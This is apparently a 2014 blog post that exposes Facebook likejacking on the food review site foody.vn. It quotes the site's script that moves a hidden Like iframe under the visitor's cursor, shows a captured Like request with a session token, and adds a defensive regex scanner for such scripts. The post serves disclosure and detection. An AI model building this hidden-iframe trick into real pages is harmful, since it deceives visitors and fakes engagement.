Thursday, February 27, 2014

foody.vn and Facebook likejacking


http://foody.vn is a Vietnamese startup that received investment from CyberAgent Ventures last year (http://e27.co/cyberagent-ventures-invests-in-vietnam-food-review-site-foody-vn/)

I was looking around the site and noticed that they are using a shit trick called Facebook likejacking, as in the screenshot below:

A POST request to Facebook is generated when you click the close button at the top-right corner.
It was blocked by my antivirus, sorry foody!

Look at the detailed headers of this request:


Request URL: https://www.facebook.com/plugins/like/connect
Request Headers (CAUTION: Provisional headers are shown.)
Content-Type: application/x-www-form-urlencoded
Origin: https://www.facebook.com
Referer: https://www.facebook.com/plugins/like.php?href=https://www.facebook.com/FoodyVietnam&send=false&layout=button_count&width=450&show_faces=false&font&colorscheme=light&action=like&height=21&appId=349480478502595
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.117 Safari/537.36

Form Data
fb_dtsg: AQDBhOAV
href: https://www.facebook.com/FoodyVietnam
action: like
nobootload:
iframe_referer: http://www.foody.vn/
ref:
__user: 1117881115
__a: 1
__dyn: 7wfGbwKBAo
__req: 1
ttstamp: 265816866104796586
__rev: 1139153


So what happens behind that? The hidden Like button sits under the close button. Modify the CSS and it appears:

The JavaScript function that checks the current user's Facebook login status to do their rat trick:
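window.fbAsyncInit = function () {
    // Minified source: !0 is `true`.
    FB.init({
        appId: "395614663835338",
        channelUrl: "http://www.foody.vn/channel.html",
        status: !0,
        cookie: !0,
        xfbml: !0,
        frictionlessRequests: !0
    }), $(function () {
        // #fbLike is the element that gets moved around below.
        var a = $("#fbLike");
        // Only continue for visitors who are logged in to Facebook.
        a.length > 0 && FB.getLoginStatus(function (b) {
            if (b.status == "not_authorized" || b.status == "connected") {
                var c = $.cookie("fbCookie");
                // Cookie already set: remove the element. Otherwise keep it
                // under the mouse pointer on every mouse move.
                c ? a.remove() : $(document).mousemove(function (b) {
                    a.css({
                        left: b.pageX - 15 + "px",
                        top: b.pageY - 3 + "px"
                    // Once focus has moved to #fbIframe (the iframe was clicked),
                    // set the cookie for 5 days and remove the element.
                    }), $(document.activeElement).attr("id") == "fbIframe" && ($.cookie("fbCookie", "1", {
                        expires: 5,
                        path: "/"
                    }), $.cookie("fbPro", provinceId || 217), a.remove())
                })
            }
        })
    })
};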
You can see the full source here: http://static.foody.vn/Scripts/public.core.min.js
Backup code: public.core.min.js_part1 , public.core.min.js_part2
At this time, foody's Facebook page has more than 240k likes; how many of them are real? ;)
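
The function above has a recognizable shape: a mousemove handler that keeps an element under the pointer, plus a `document.activeElement` check to learn when the iframe was clicked. The following is an added example (not from foody.vn's script or the original post) of a static check for that combination when reviewing a page's scripts; the indicator names, the scoring rule and both sample scripts are constructed for illustration.

```javascript
// Static heuristic for cursor-following likejacking scripts (added example).
// Indicator names and the "all three core indicators" rule are assumptions.
const INDICATORS = [
  // a handler runs on every mouse movement
  { name: "mousemove-handler", re: /\.mousemove\s*\(|["']mousemove["']/ },
  // an element's left/top is computed from the pointer coordinates
  { name: "follows-pointer",
    re: /\b(left|top)\s*[:=][^;,}]*\b(pageX|pageY|clientX|clientY)\b/ },
  // the page checks which element has focus (an iframe takes focus when clicked)
  { name: "iframe-focus-check", re: /document\.activeElement/ },
  // a cookie is written, e.g. so the trick fires only once per visitor
  { name: "one-shot-cookie", re: /\$\.cookie\s*\([^)]*,|document\.cookie\s*=/ },
];
const CORE = ["mousemove-handler", "follows-pointer", "iframe-focus-check"];

// Returns the indicators found (with the 1-based line of the first match)
// and a verdict: suspicious only when all core indicators co-occur.
function scanScript(source) {
  const hits = [];
  for (const { name, re } of INDICATORS) {
    const m = re.exec(source);
    if (m) hits.push({ name, line: source.slice(0, m.index).split("\n").length });
  }
  const names = hits.map((h) => h.name);
  return { hits, suspicious: CORE.every((n) => names.includes(n)) };
}

// Constructed sample: shortened form of the function quoted in the post.
const LIKEJACK_SAMPLE = `
var a = $("#fbLike");
$(document).mousemove(function (b) {
  a.css({ left: b.pageX - 15 + "px", top: b.pageY - 3 + "px" });
  $(document.activeElement).attr("id") == "fbIframe" &&
    ($.cookie("fbCookie", "1", { expires: 5, path: "/" }), a.remove());
});`;

// Constructed sample: an ordinary tooltip that follows the pointer.
const TOOLTIP_SAMPLE = `
document.addEventListener("mousemove", function (e) {
  tip.style.left = e.pageX + 10 + "px";
  tip.style.top = e.pageY + 10 + "px";
});`;

console.log(scanScript(LIKEJACK_SAMPLE));
console.log(scanScript(TOOLTIP_SAMPLE));
```

A regex pass like this only narrows down which scripts deserve a manual read; a tooltip that follows the pointer is not flagged because it never checks iframe focus.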

// After the basic review above, we can now take a deeper look inside the real likejacking of foody.vn.
See the video pls ;)... Dog tail appears soon!